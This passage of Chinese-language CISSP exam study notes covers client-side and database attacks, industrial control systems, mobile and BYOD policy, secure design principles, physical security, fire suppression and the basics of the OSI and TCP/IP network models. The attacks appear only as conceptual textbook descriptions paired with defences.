从磁盘加载操作系统,BIOS存储在EEPROM上,BIOS的升级称为“Flashing the BIOS” 33、很多硬件设备(如打印机、调制解调器)需要一些处理能力,以便 减少操作系统自身的负担,这些迷你操作系统放在设备的固件芯片中, 通常也是EEPROM。 34、基于客户端的攻击(Client-Based):一般情况下,当讨论攻击时, 攻击的主要目标是服务器或服务器端组件。客户端或客户端集中攻击的 目标是客户机本身或客户机上的进程。 35、客户端攻击的一个常见例子是,恶意网站将恶意的移动代码(如 applet)通过脆弱的客户端浏览器传送到客户端。客户端攻击可以发生在 任何通信协议上,而不只是 HTTP。另一类基于客户端的潜在漏洞,是本 地缓存中毒的风险。 36、关于客户端安全,applet准许服务器向客户端发送执行代码,要确保 这些代码是安全的,并能正确的屏蔽恶意活动。常见的两类:Java applet 和ActiveX控件。 Java applet是简短的Java程序,为了防止Java applet窃取信息,有沙箱会 控制其内存访问。 ActiveX是微软的产品,只能运行在IE上,不受沙箱的限制,它对 Windows 操作系统环境具有全部的访问权限,并且可以执行很多特权操 作。 许多安全管理员禁止从可信站点之外的所有站点下载任何ActiveX内容。 37、ARP缓存投毒,是攻击者伪造回应ARP进入客户端的ARP缓存(10分 钟),或者通过木马在本地使用命令创建永久性的静态ARP,这样,客户 端传输的数据流将发送给非预期的其他系统。 38、DNS缓存投毒,有很多种方法,包括主机投毒、攻击DNS服务器,攻 击缓存DNS服务器、给客户端错误的DNS服务器、DNS查询欺骗等等。 主机投毒主要是对hosts文件进行操作。 对授权DNS服务器攻击的目的是修改FQDN原始记录(Fully Qualified Domain Name)。但这个难度大,很快会被发现。 大多数攻击者将目光转向缓存DNS服务器,比如那个著名的Kaminsky DNS漏洞。 给客户端一个假的DNS服务器,ᨀ供域名查询服务。 DNS查询欺骗,是向客户端发送虚假的响应,而真的答复被丢弃。 防范措施:打补丁、安装IDS、审计DNS日志、查看DNS日志、DHSP 日志、防火墙日志、交换机日志、路由器日志发现异常。 39、和数据库安全相关的若干概念包括聚合、推理、数据挖掘、数据仓 库和数据分析。 40、聚合(aggregation)用来收集大量的低安全级别低价值的信息,结 合起来产生高安全级别高价值的信息。 41、推理(inference)和聚合类似,但需要利用人的推理能力,不是简 单的数据聚合。 42、对推理攻击的防范方法: 与聚合类似,最好防范是对赋予个人用户的特权保持持续警惕。 此外,数据的故意混淆可能被用来防止对敏感信息的推理。例如,如 果会计只能够检索到100 万人的工资信息,那么将不可能获得任何有关 员工个人的有用信息。 最后,可以使用数据库分区帮助降低这些攻击。 43、数据仓库(data warehouses )存储多个数据库汇总来的信息,并包 括历史信息,然后用专业分析技术来做数据挖掘,发现历史数据中潜在 的信息。 44、数据字典是和数据库相关的关键信息,包括类型、源、格式、关系 等等,是一种具体级别的元数据。 45、元数据是关于数据的数据。 46、大数据是指那些已经变得非常大的数据集合,传统分析和处理手段 效率低下。并行数据处理将一个大的任务划分为更小元素,然后将每个 元素分发到不同的子处理系统进行并行计算。 47、云计算通常被认为是基于互联网的计算,处理和存储是通过网络连 接而非在本地进行,相关概念:SaaS、PaaS、IaaS 48、网格计算是并行分布处理的一种形式,它松散地把大量的处理节点 组合在一起,为实现某个大的计算目标而工作,某个成员处于空闲时, 加入一个网格组,下载任务然后开始计算并ᨀ交结果,比如需求外星生 物、预测天气、解决素数问题。由于网格计算项目大都开放,每个成员 可以保存工作包的副本并检查内容,所以网格项目不关注机密性。 49、点对点(Peer-To-Peer)技术是网络和分布式应用的解决方案,用于 点对点见共享任务和工作负载,与网格的区别:没有中央管理系统。比 如Skype、BT、Spotify(流媒体/音乐发行),主要涉及盗版、被监听、缺 乏中央管理、消耗带宽等问题。 50、工业控制系统(ICS)包括集散控制系统(DCS)、可编程逻辑控制 器(PLC)和数据采集与监控系统(SCADA)。 industrial control system(ICS) distributed control systems (DCSs) programmable logic controllers (PLCs), supervisory control and data acquisition(SCADA) 51、DCS(distributed control systems)用在车间,以集中的方式收集局 部的状态和性能数据,并向局部控制器发送命令。 52、PLC (programmable logic controllers)是有效的单用途或专门用途的 数字计算机。它们通常被部署用于各种工业机电自动化操作,如大规模 的数字灯光显示控制系统(如体育场内或拉斯维加斯大道上的巨型显示 系统)。 53、SCADA(supervisory control and data acquisition) 系统可以作为独立 的设备使用,也可与传统 IT 系统组成网络。大多数 SCADA 系统以最小 的人机接口设计。通常,它们使用机械按钮和旋钮,使用简单的液晶屏 接口。 54、SCADA、PLC、DCS 单元和它们的最小人机接口的静态设计,应该防 止系统陷入危险或被修改。然而,这些工业控制设备很少集成安全。 Stuxnet 首次在位于核设施的 SCADA 系统中放置了rootkit。许多 SCADA 厂商已经开始实施解决方案来改进他们的安全。 55、XML攻击用来伪造信息发送给访客。XML攻击日益关注的一个领域是 安全断言标记语言SAML,SAML通常用来ᨀ供基于Web的SSO解决方案。 攻击者伪造SAML通信或者窃取访问者令牌,就可以绕过认证并获得对网 站的未授权访问。 56、OWASP是一个非营利性的安全项目,目的在于ᨀ高WEB的应用程序 的安全性。 57、15英尺范围(4.57米)内的人都可以听到你说话。 58、便携移动设备(手机、PAD)丢失后,远程擦除的问题,小偷可能 不让联网;可能会被反删除工具恢复;所以还是应当对设备加密。 59、锁定:Lockout,类似于账户锁定,当用户未能ᨀ供他们的凭据并多 次重复尝试时,账户或设备被禁用(在一段时间内锁定)或直到管理员 清除锁定标志。 60、在移动设备上,设备制造商把操作系统和预装应用与用户的程序与 数据分开,采用存储分隔(storage segmentation)。 此外,还可进一步把公司的和个人的分开。 61、移动设备管理MDM的目标是ᨀ高安全性、ᨀ供监测、远程管理、支 持和故障排除。 62、大多数移动设备并不安全,即使有一个强大的口令,仍可通过蓝牙、 无线或USB访问该设备。 63、密钥存储的最佳选择是可插拔硬件和可信平台模块TPM,但手机和 平板电脑很少ᨀ供这些选择。 64、锁屏:screen locks,并不是真正的安全操作,因为锁屏可能有变通 办法:如通过紧急呼叫功能访问电话应用程序;如果黑客通过蓝牙、无 线或 USB 电缆等方式连接到设备上,锁屏就不一定真的能保护设备。 65、凭证(credential)管理就是指把用户名和密码(或者其他多因子) 存储并管理起来。 66、支持GPS的移动设备,拍照时会嵌入时间信息和地理信息 (Geotagging),小心别人根据你上传的照片得知你什么时候在哪里。 67、应用控制(Application control):应用控制是一种设备管理解决方 案,可以限制设备上应用的安装,也可被用来强制安装特定的应用或执 行某些应用的设置,以支持安全基线或保持其他形式的合规性。在BYOD 中用得比较少。 68、用户需要了解他们使用BYOD的好处、限制和后果,签署BYOD策略, 参加培训。 69、BYOD策略应该关注备份,不管是单一的备份,还是把个人数据与公 司数据分开的备份。擦除数据时,也有这个问题,总之要做好数据隔离。 70、BYOD策略还应该考虑设备故障时谁负责维修,补丁管理、反病毒管 理、取证时没收设备,员工可能需要同意对他们移动设备的跟踪和监控。 71、员工应该将BYOD设备视为公司财产。在工作中,首要目标是完成生 产任务。一些环境不允许使用相机,要明确说明。 72、应用白名单是禁止未授权软件能够被执行的安全选项。白名单也被 称为默认拒绝或隐含拒绝。在应用安全中,白名单阻止任何或所有软件, 除非它们在预先批准的例外名单中。(而黑名单是典型安全设备立场的 重要违背)。OSGT:这个用的不多。 73、静态系统(又名静态环境,Static environment)是一组不改变条件、 事件和周边的环境。静态系统一旦被理解,就不应该再让人产生惊讶。 这个系统被设计为保持不变。比如老式的大型机只支持单一任务、游戏 机、早期的车辆系统等。 74、五种基本的安全技术机制:分层法、抽象、数据隐藏、进程隔离、 硬件分隔。 1、分层法(layering)把最敏感的功能放在中心,逐渐扩大的同心圆代 表敏感度较低的功能,类似操作系统的保护环。居住在大楼中低租金的 公寓内,就不能乘坐电梯到达租金更贵的楼层。不同的层只能通过特定 的接口进行通信(比如用户层通过系统调用访问内核),接口用于维护 完整性,内层不了解也不依赖外层,每层都不受其他层的影响和篡改。 2、抽象(abstraction),属于面向对象中的“黑箱”原则,即认为用 户没有必要知道对象的工作细节,只知道使用正确的语法获取返回结果 即可。对象组也即角色赋权,也使用了这种抽象原则。分类也是抽象。 3、数据隐藏(data hiding)是多级安全的一个重要特征,它确保在某 个安全级别的数据对于运行在不同安全级别的进程是不可见的。 4、进程隔离(process Isolation)要求操作系统为每个进程的指令和数 据ᨀ供不同的内存空间。组织某一进程读区或写入属于另一个进程的数 据。可以阻止未授权的访问,也能保护进程的完整性。虚拟机也可以看 成是这种隔离原则的体现。 5、硬件分隔(hardware segmentation),类似进程隔离,但是使用硬 件来分隔,较为少见,通常被限制在国家安全实现中。 75、可问责性是任何安全设计中的一个重要组成部分,很多安全要求较 高的系统都有针对个人特权操作的审计设施, 如paper-and-pen visitor logs和无法修改的审计跟踪。 76、隐蔽通道是使用设计、开发、管理者都没有意识到信道传送信息, 所以完全游离在安全控制措施之外。 比如时间隐蔽通道(通过改变资源的性能或时间来传达信息)。 ⬀储隐蔽通道(将数据写到其他进程可以读到的公共区域来传达信 息)。 77、系统突然崩溃,接着又重新恢复,这个过程就可能存在两个失去安 全控制的机会,因为有的系统关机过程中会卸载安全控制,刚开机时也 还没有加在安全控制。 所以,可信恢复的概念产生,就是确保系统在安全控制失效的情况下 不发生任何访问活动,或者一直保持安全控制在线。 78、维护钩子(Maintenance hooks)是开发人员才知道的系统入口,也 被称为后门。必须禁止这些入口点,并通过审计日志来发现这些访问行 为。 79、增量攻击(incremental attacks)以缓慢的、渐进的增量方式发生, 数据欺骗(data diddling)和salami攻击就是这样。 1、数据欺骗攻击者在数据进入系统之前、中途、之后,恶意的修改数 据。 2、salami攻击就像切一小片香肠,攻击者系统化的削减账户(比如1分 钱1分钱地偷)。所以要通过适当的职责分离和对代码的控制,才能阻止 这种攻击。像员工正式通报这种攻击,也有助于防止salami攻击。 80、编程中最大的缺陷:缓冲区溢出。 81、TOC是检查时间,也即主体检查客体状态的时间,TOU是使用时间, 是在程序访问客体的时间,在TOC和TOU之间,攻击者可能用另外一个客 体替换原先的客体。检查时间到使用时间(TOCTTOU)攻击通常被称为 竞争条件(race conditons)。一个经典例子是,数据文件在被身份验证 后和读取之前被替换,这是一种状态攻击,攻击一个系统状态过渡到另 一个状态之间的时差、数据流控制。 82、消除电磁辐射的最容易方法是,1.电缆屏蔽或放入导管。2.物理安全 控制未授权人员和设备过于靠近设备和电缆。 83、使用法拉第笼使得任何电磁信号都不能进出其包围的区域。干扰或 噪声发生器则让攻击方难以检出某个信号,前ᨀ是干扰器不能干扰设备 的正常操作,这可以通过控制区来限制干扰。 例如:如果只在办公场所的几个房间内使用无线连接,就可以使用信 号法拉第笼将这些房间包围起来,然后在控制区外放置噪声发生器,这 样,房间内可以正常使用无线连接,房间外不能使用无线连接,也不能 偷听。 第10章 物理安全需求 1、物理控制是第一道防线,人员是最后一道防线。 2、关键路径分析是一种系统性的工作,用于鉴别确定关键任务、过程、 操作以及所有必要支持之间的关系。比如,一个电子商务服务器依赖于 网络、硬件、存储、电源、空调等等。 3、对资产的保护很大程度上取决于场所(site,站点)的安全性,容易 遭受暴乱、打劫、非法闯入、野蛮破坏、高发案的区域显然不适合做场 所,场所还要能防自然灾害,能应对极端的天气,能阻拦明显的非法闯 入企图,要防振动,要评估非法闯入容易借助的树木、灌木或人为因素。 4、可视性(visibility):周围地形如何,如果有人骑车和步行靠近,能 否发现?附近的情况要考虑:附近有居民区吗?最近的消防队、医院和 警察局在哪里?有化工厂、收容所、大学、建筑工地等独特的潜在危险 吗? 5、环境设计预防犯罪(Crime Prevention Through Environmental Design, CPTED),也被称为安全架构(secure architecture),通过结构化的物理 环境和周围环境,在潜在的罪犯做出任何犯罪行为之前影响其个人决定。 它研究如何正确设计通过直接影响人类行为而减少犯罪的物理环境。 6、CPTED 和目标强化是两种不同的方法。目标强化(target hardening) 强调通过物理和人工障碍(报警器、锁、栅栏等)来拒绝访问。 最佳的途径往往是:先通过 CPTED 方式构建一个环境,然后根据需要 在设计上应用目标强化组件。 • 7、CPTED措施:(来自AIO) 1.设施周围的树篱和花架不得高于2.5英尺,这样就不会被其他人利用爬上窗 口; 2.数据中心应位于设施中央,这样设施的墙壁就能缓解任何外来力量的破坏, 而不必由数据中心来承受; 3.街道陈设物(长椅和桌子)鼓励人们坐下来观察周围发生的一切,这阻碍 了犯罪活动; 4.企业的厂区不应包含树林覆盖的区域或其他入侵者可以隐藏的地方; 5.保证以全景方式安装 CCTV 摄像头,从而使犯罪分子知道自己的行为将会被 拍摄下来,其他人则知道环境受到彻底监控,因而更有安全感。 6.由于明显缺乏躲藏或实施犯罪的场所,因此清晰的视线和透明度可用于阻 挡潜在的罪犯。 7.停车场车库内的楼梯间和电梯可能使用玻璃窗,而不是金属墙壁,以便人们在 这种可见性更强的环境中感到更加安全。 8.停在车库内的每排汽车都采用矮墙和建筑立柱(而不是实心墙壁)隔开,以允 许步行者查看车库内发生的活动。 9.护柱指矮小的柱子,常用于阻止车辆通行,从而保护建筑物或行走在人行道上 的行人不会受到车辆的伤害。它们也可以用于引导步行者。 10.甬道两边有令人赏心悦目的花草,这是CPTED设计要你沿着甬道的方向走。 11.在城镇和城市中,会有一些区域专供人们遛狗,有一些野餐桌供人使用,还 有厕所、公园以及供人们运动(棒球、足球)的场所。所有这些都让当地人有生 活在一个集体之中的感觉,有家的味道。这有助于人们认识谁是当地人、谁是外 来人、什么行为正常和什么行为不正常。如果人们感觉他们生活在自己熟悉的邻 里之间,他们便更有胆量挑战可疑行为和保护当地区域。这些措施还会让潜在的 罪犯觉得他们不属于这个地方,他们的行为有被发现的危险,而且他们的违法行 为不会被容忍或忽视。 8、震动要小,要有空气正压,防止有害烟尘进入,液体也要正向流动。 内部隔断要延伸至天花板楼板并且有与墙体相当的强度。在频繁发生震 动的地方,要安装支架,吸收震动的影响。 9、对物理安全的安全控制也是分为物理的、技术的、行政的, 物理的包括围墙、照明、锁(即便是电子锁、生物识别)、陷阱、 狗、警卫, 技术的包括CCTV、HVAC(空调)、监控、入侵检查、报警等, 行政的包括选址、站点管理、人员管理、意识培训、应急响应规程。 10、设计环境物理安全时,记住顺序:先是阻拦(Deterence,威慑), 然后拒绝(Denail)、然后检测(Detection),然后延缓(Delay)。 11、现场替换备件如果不可行,与硬件供应商签订SLA非常必要。要制定 替换和修理时间表,以平均无故障时间(Mean Time to Failure,MTTF), 平均修复时间(Mean time to Repair,MTTR)为基础,一定要在MTTF之 前进行替换。 平均故障间隔时间(Mean Time Between Failure),是首次故障后,在 发生故障的平均间隔时间。如果MTTF和MTBF相似,厂家往往只列出 MTTF。 12、配线间的安全策略: 不要把配线间做存储区; 要有足够多的锁,钥匙授权管理; 整洁,视频监控,纳入环境监控; 定期物理检查; 使用开门传感器并log进入记录。 13、机房要在建筑物的核心位置,避免放在底层、顶层和地下室。远离 水、气和污水管道,防止管道泄漏带来的风险。机房墙壁要能防1小时的 火。 14、证据存储(Evidence storage)主要用于企业内部调查或执法调查, 可能涉及: 专用的存储系统、不与互联网相连、 计算HASH值、加密数据、 跟踪存储系统的活动, 限制安全管理员和法律顾问的访问。 15、对设施内所有地方的进入要求不应该同等对待(分区),从地板到 天花板之间的全封闭墙壁被用于分隔不同敏感度和机敏性的区域。 AIO:许多建筑物都有吊顶,这意味着内部分隔不能延伸到真正的天花 板(只能到达吊顶处)。入侵者能够掀开天花板,然后爬过隔板。 16、智能卡(Smartcards )是信用卡大小的身份证、员工证或安全通行 证,卡上具有磁条、条形码或植入的集成电路芯片(IC卡)。 智能卡包含了经过授权的可以被用于身份识别和或身份认证目的的持 卡人信息。 某些智能卡甚至具有处理信息的能力或被用于在内存芯片上存储一定 数量的数据。 大多数情况下,智能卡需要多因子配置,防止智能卡被盗或丢失后被 冒名替代。最常见的用于智能卡的多因子认证要求使用 PIN。 17、接近式读卡机(Proximity reader):无源设备改变了由读卡机产生 的电磁场,读卡机能检测到这种改变: 无源设备(没有电,只有小磁场,超市里贴的磁条) 场源设备(是电子设备,由EM场产生供电,挥卡进门)。比如交通 卡。 发送应答器(有电源,如车钥匙或车库开门系统) 18、为了阻止物理访问控制的滥用、伪装和尾随,还必须部署保安人员 或其他监控系统。 滥用包括敞开安全门、绕过锁或访问控制。 伪装是指使用其他人的安全 D 获得进入某座设施的权限。 尾随是指跟随着某个人通过受到安全保护的门或通道,而自己并没有 接受身份识别或身份认证。 19、即使是物理访问控制,审计跟踪和保持访问日志也非常有用。它们 可能需要保安人员手工建立,也可能是在有足够的自动化访问控制机制 (例如,智能卡和某些接近式读卡机)的情况下自动生成。 20、最简单的入侵检测系统是在入口点使用干触点开关,在门或窗被打 开时开始检测工作。 入侵检测要连接入侵警报器才有用。可靠的入侵检测和警报系统都需 要有能保证24小时可用的备用电池。 为了防止通信线路被截断,要求有监控线路的心跳传感器,一旦无法 检测到心跳信号,就报警。 21、UPS将电力ᨀ供给与之相连的设备,通过UPS的直通,维持连续和平 稳的电力供应。在主要电源出现故障时ᨀ供持续的电力供应。 22、带有电涌保护(surge protector)的配电盘(power strips)也是一种 防护,通过保险丝(fuse)的熔断(blow)来保护设备不受功率剧烈变 化带来的损害,但是保险丝熔断后电力就会中断,所以并不如UPS。 23、发电机是电源的替换和后备方案。 24、电源术语: 故障(fault)电力短暂消失;中断(blackout)电力完全消失; 电压不足(sag)短暂的电压不足;脉冲(spike)短暂高电压; 降压(brownout)较长时间电压不足;电涌(surge)较长时间高电 压; 启动功率(inrush)电源启动时的电涌;瞬时现象(transient)短暂的 线路噪声干扰; 平稳(clean)平稳的电流;接地(ground) 25、ANSI标准允许电力来源和设施电表之间可以降压8个百分点,墙壁插 座和设施电表之间可以有3.5个百分点的降压,这都是标准之内的,不能 标记为brownout 26、计算机房的温度应该保持在摄氏15度到23度之间(华氏60~75度)。 湿度应该维持在40%到60%之间,湿度太高会侵蚀,太低会产生静电。 27、水的问题:漏水和水灾。只要有可能,就要将放置服务器的房间和 重要计算机设备远离任何水源或传输管道。 在关键任务系统的地板周围安装水检测电路。水检测电路具有警报装 置。 为了将紧急事件减到最少,一定要熟悉关闭阀门和排水装置的位置。 应该对所在区域处理暴雨或水灾的设施的能力进行评估。这些设施是 位于小山,上还是山谷中?是否有足够的排水装置?放置服务器的房间 是位于地下室还是在一层? 28、起火三角形:燃料、高温、氧气,三角形内部是化学反应。这四个 元素去掉一个,就能灭火。 29、水能抑制高温 苏打酸和其他干粉能抑制燃料供应 二氧化碳抑制氧气供应 哈龙替代物(哈龙*)和其他非易燃气体能干扰化学反应或抑制氧气供 应(捕捉游离基和破坏火焰接触面)。 记忆:哈龙把氧气都吞了,哈龙还能干扰化学反应。 30、数据中心的大多数火灾都是由配电插座过载导致的。 31、灭火器分类:(必考) 级别 火灾类型 灭火材料 A 普通易燃品 水、苏打酸(干粉或液态) B 液体 二氧化碳、哈龙*、苏打酸 (不能用水,因为液体会浮在水的表面,而且会导致燃烧液体飞溅) C 电的 二氧化碳、哈龙* (不能用水,因为会触电) D 金属 干粉 (金属燃烧会产生氧气,所以不使用气体抑制类) 32、起火有4个阶段,开始、冒烟、火焰、高温。越早检测到火,就越容 易使用相应的抑制物灭火,损失就越小。开始阶段只存在空气电离(不 冒烟)。 32、每个人都应该熟悉他们所在设施的灭火机制,都应该熟悉他们工作 地点至少两条安全撤离通道,都应该接受培训,都知道灭火器的位置和 使用方法。培训应该包含心肺复苏(CardioPulmonary Resuscutation, CPR)、紧急关闭程序、约好的会合地等等。 33、防火检测:四类: 固定温度检测:设定好的温度检测,触发灭火装置,触发器是花洒头 部的金属或塑料的可融化部件。 温度上升比率检测。 火焰激发系统(根据火焰的红外线能量触发)。 烟感(根据放射性电离的感应)。 34、在人性化的环境中,放水。在无人居住的机房,释放气体。 35、四种放水系统: 湿管道系统(wet pipe,总是充满了水); 干管道系统(dry pipe,里面有压缩的空气,灭火装置触发后,空气泄 漏后会打开水阀); 洪水系统(deluge system)是干管道的一种,管道比较粗,不适合电子 设备环境; 预先响应系统(preactio nsystem)是干湿混合的,平时是干的,通过 热感烟感检测到初期火灾后,管道中充水,花洒头融化后喷水。如果花 洒头融化前火被熄灭,则管道被手工排空又成为干的,也即洒水头触发 前可以人工干预。 36、预先响应系统是最适合计算机和人都存在的环境的水系统。基于水 的灭火系统的常见故障是人为错误,比如水源被关闭,没有火的时候触 发放水。 37、气体释放系统比水系统更有效。但不应当部署在有人的环境中(因 为会没有氧气),气体介质为二氧化碳、哈龙或FM-200(哈龙替代物)。 38、哈龙的问题是高温(华氏900度)会变成有毒气体,除此之外,它还 会破环臭氧。可以用哈龙替代物或者低压水雾替代哈龙,水雾可以降温, 但不适合电子设备。 39、火灾引起的破坏主要是烟和热,烟对大多数存储设备造成损坏,热 会损坏所有电子设备(华氏175度(摄氏80度)损坏CPU和RAM)。灭火 介质会引起电路短路、加快侵蚀,导致设备无法使用。 40、建筑物边界(perimeter)安全控制:栅栏(fence)、大门、旋转门 (turnstiles)、陷阱(mantrap) 41、栅栏(fence)包括地上的画线、铁丝网、水泥墙、激光防线。3~4 英尺(1.2m)高可以防范随意(Casual)的进入,6~7英尺(2.1m)已 经难以攀越,阻止大多数入侵者,但意志坚定者除外;8英尺高带铁丝网 可以阻止下了决心的入侵者。(1 英尺=12 英寸=0.3048 米) 42、大门是栅栏上受控的出入点,大门的阻挡程度和栅栏应当一致,大 门关闭后,不ᨀ供任何的脆弱性,门应当尽量少,保安操作门,没有保 安时,用狗和CCTV。 43、旋转门每次只能进一个人,而且是单方向转动,要么进、要么出。 旋转门是一个安全的Revolving Door(十字形旋转门)。 44、陷阱的目的是牵制主体,直至其身份得到确认和验证。认证后内部 的门才打开,如果没有得到授权,两个门都关,警卫会把来人送走或带 走。陷阱体现了delay的特性。陷阱会有防捎带(piggybacking)和尾随 (tailgating)的特性。 45、照明是最常用的边界安全控制形式,防范随意的入侵者、闯入者、 小偷、在黑暗中作祟的人。 46、照明不应该照亮保安、狗、岗哨。照明不要给居民、道路、铁路、 机场带来麻烦。照明不要强光反射干扰保安和狗。 47、最终都要依靠人的介入来阻止实际的入侵和攻击,保安部署在边界 内外,监视进出口,监视显示器,保安的真正优势在于能够对任何环境 作出反应。 48、但不是任何环境都适合部署保安,不是所有保安都值得信赖,他们 会受伤、生病、请假、受到社会工程学攻击,他们更注重自我保护,保 安的费用很高。 49、看门狗可以替代保安,作为deterrent和detection的形式,狗是非常 有效的,但喂狗的费用很高,还会带来保险和责任要求。 50、内部安全:主要是控制来访者,通常会有护送者陪着给访问者,监 视他们的进出入和活动。 如果没人跟着,就需要使用钥匙、密码锁、徽章、运动探测器、入侵 警报。 51、锁是身份标识(identification)和身份认证机制的强硬标识(A lock is a crude form of an identification and authorization mechanism)。 锁本身作为验证设备对进出进行授权和限制,锁通过钥匙验证了你的 身份然后让你进入。 52、有钥匙表明有授权,使用钥匙的锁叫预置锁(preset lock),预置锁 是最常见和最廉价的物理访问控制设备。 53、可编程锁或密码锁比预置锁ᨀ供了更多的控制,这些锁可能采用键 盘、智能卡、密码设备的数字或电子控制。 54、比如:电子访问控制(EAC)锁包括三个元素:保持门关闭的电磁体, 读卡机验证后让电磁体失效,闭门感应器让电磁体重新生效。 55、员工证(badges,徽章)、身份证(Identification card)或安全 ID(security ID)都是物理身份标识,badges经常包括照片、个人信息、 磁条,帮助保安核实信息。考虑刷卡进门,员工证既被用于身份标识, 又可以被用于身份认证。 56、运动探测仪用于感知物体运动,类型有很多,比如红外线、热能、 波形(发射高频微波并对反射波监测)、电容(对电场、磁场变化进行 监测)、光电(在昏暗的房间内使用)、音频(对声音监测)等。 57、闭路电视(CCTV)使得一个保安能够从一个中央位置立刻监控许多不 同的区域,即CCTV增加保护的可见性。CCTV并不作为主要的检测工具, 因为需要支付高额费用给坐在那里的人观看屏幕。CCTV是预防措施,审 查(即看录像)是检测措施。 58、入侵警报: 威慑警报(deterrent),可能会采用额外的加锁、关门等,使得进一 步入侵更难。 排斥警报(repellant)使用汽笛或钟声这样的声音,并会将灯打开。主 要是让入侵者气馁(discourage)。 通知警报:对入侵者缄默,但会记录数据并通知管理员、保安和执法 机构。 59、警报按照所在地方分类:本地警报广播信号(120分贝以下),警报 系统必须受到保护,警报附近有安全团队和保安。 集中式警报:本地不报警,通过信号通知远程集中式监控。 辅助警报系统能够通知消防、警察和医院来及时响应。 60、现实世界中,部署多层物理访问控制,最外层是照明,整个周边都 被清楚照亮,灯光区域内,有栅栏或墙,特定控制点有出入口,这些地 方有门、旋转门、陷阱,通过CCTV和安保人员监控。每个关口都要求鉴 别和认证。比如:照片是鉴别,看照片就是认证。最敏感的资源和系统 只有最高特权的人可以访问,并且要位于建筑物的中央。 61、不论何种情况下,保护人员生命安全是最重要的方面。人永远是重 中之重,许多组织采取人员紧急计划(Occupant Emergency Plan,OEP) 指导和协助在灾难发生时维持人员生命安全。OEP不解决IT问题或业务连 续性问题,BCP和DRP才解决那些。 领域4-通信和网络安全 第11章 网络安全架构与保护网络组件 1、上层协议栈(应用层、表示层、会话层)中的报文被称为数据流(Stream), 在传输层,TCP的称为段(segment),UDP的称为数据报(datagram), 网络层称为数据包(Packet),数据链路层称为帧(Frame), 物理层称为Bit。 2、物理层从数据链路层接收帧,把帧转化为通过物理连接介质传送的比 特。还负责接收来自物理连接介质的比特,并将比特转换为数据链路层 所使用的帧。 3、物理层涉及的电气规范、协议和接口标准: EIA/TIA-232(449)、X.21、高速串行接口HSSI、 同步光网络SONET、V.25/V.35。 主要控制同步、噪音、吞吐率、介质访问等。 4、物理层(第一层)的硬件设备主要包括网络接口卡(NIC)、集线器 (hub)、中继器(repeater)、集中器(concentrator)、放大器 (amplifier)。 5、数据链路协议负责将IP包转换为可以进行传输的适当格式,帧格式如 以太网IEEE 802.3,令牌环802.5,ATM、光纤分布式接口FDDI、铜线分布 式接口CDDI。 6、数据链路层内驻留的协议:串行线路网络协议(SLIP)、点对点协议 (PPP)、ARP(将IP解析为MAC)、RARP、L2F、L2TP、PPTP、ISDN。 7、数据链路层的网络硬件设备包括交换机和桥。 8、数据链路层包含两个子层,逻辑链路控制(LLC)子层和MAC子层。 并不是考试的关键。 9、MAC地址用16进制表示的6字节(48比特), 如00-13-02-1F-58-F5 前三个字节表示制造商,是组织唯一标识符(OUI,由IEEE控制的), 后三个字节由供应商控制。 为了向IPv6做准备,MAC也有从48位转换到64位的举动。 10、网络层负责ᨀ供路由和尽力传送,也有错误检测和通信控制(traffic control)。 三个最被认可的非IP协议是:IPX(Novell)、AppleTalk和 NetBEUI(微软的)。 微软已经将NetBEUI工作于TCP/IP之上,然后支持SMB(Sever Message Block)协议,也被称为通用互联网文件系统(Common Internet File System,CIFS)。 11、非IP协议是罕见的,大多数防火墙无法对这些协议的数据包头、地 址和有效载荷进行内容过滤。 12、网络层的协议:RIP、OSPF、BGP、IP、ICMP、网络组管理协议 (IGMP)、IPSec、IPX、NAT、网络简单密钥管理协议(SKIP) 13、工作在第三层的硬件设备包括路由器和桥式路由器。 14、路由器基于速度、跳数、优先级等信息决定了数据包传输的最佳逻 辑路径。 路由器使用IP地址来指导数据包的传输。 桥式路由器主要在第三层工作,必要时在第二层工作,是一种先尝试 路由、失败时默认桥接的设备。 15、路由协议主要有两个类别,距离矢量和链路状态。 距离矢量路由协议维护目的网络以及距离和跳数的列表(RIP、BGP、 IGRP)。实现还是管理都比较简单。收敛速度慢,报文量大。 链路状态路由维护一张所有连接网络的拓扑图(OSPF)。每个路由器 需要有较大的存储空间,计算工作量大。 16、距离矢量路由协议:每个路由器都不了解整个网络拓扑,它们只知 道与自己直接相连的网络情况,并根据从邻居得到的路由信息更新自己 的路由。 距离矢量协议无论是实现还是管理都比较简单。缺点:收敛速度慢,报 文量大,占用较多网络开销。 17、链路状态路由协议:每台路由器使用Hello协议来发现其链路上的所 有邻居,将每个邻居的相关信息(包括邻居ID、链路类型和带宽)打包 成链路状态数据包(LSP),并向邻居发送LSP。最终,每台路由器会在 本地数据库中存储邻居发来的LSP的副本。有了这个数据库,就可以使用 最短路径优先(SPF)算法来计算通向每个网络的首选(即最短)路径。 缺点:每个路由器需要有较大的存储空间,用以存储所收到的每一个 节点的链路状态分组。计算工作量大,每次都必须计算最短路径。 18、传输层负责管理连接的完整性并控制会话,主要通过建立逻辑连接, 实现了分段、排序、错误检查、流量控制,错误纠正、复用和网络服务 优化。 传输层的协议:TCP、UDP、SSL、TLS、SPX(顺序数据包交换) 19、会话层负责在两台计算机偏应用层面之间建立、维护和终止通信会 话。 所谓会话,就是有上下文需要被保存和使用的,在各个层次上都有会 话的概念。 会话层是在应用和应用之间建立起了连接。传输层是在计算机到计算 机之间建立起了连接。 会话管理对话控制(单工、半双工、全双工),建立checkpoint,并重 传上一次检查点以来失败的PDU。 包括这些协议:NFS、SQL、RPC。 20、表示层在数据中添加通用的结构和格式化规则,比如编码、数据格 式(音视频)、加密、压缩。 协议比如ASCII、EBCDIC、TIFF、JPEG、MPEG、MIDI等。 21、应用层:HTTP、FTP、SMTP、Telnet、TFTP、IMAP、SNMP、S-RPC、 SET、LPD(打印机后台程序) 22、网关工作在应用层,主要是用作协议转换。应用防火墙也在应用层。 23、TCP/IP模型仅由4层组成,应用层(5~7)、传输层(4)、网际层 (3)、网络接入层(1~2)。除非专门指出,默认讨论的是OSI模型。 24、TCP/IP设计目的是便于使用而不是安全,因此容易遭到攻击。 25、除了使用PPTP、L2TP和IPsec的VPN,还有一种ᨀ供协议级别安全性 的方法是采用TCP包装(TCP wrapper),TCP包装是基于端口的访问控制, 通过用户ID或系统ID限制对端口的访问,起到基本防火墙的作用。 Tcp_wrapper本质上是一种标准的Unix安全工具,是unix守护程序inetd的 一个标准插件。通过它对各项服务的劫持把关,管理员实现了对inetdᨀ 供的各种服务进行监控和过滤。 26、前1024个端口(0~1023)是知名端口。1024~49151是软件注册端 口,注册到IANA。49152~65535是随机、动态、私有端口。 27、TCP通过三次握手建立一个会话。C->S: SYN S->C: SYN/ACK 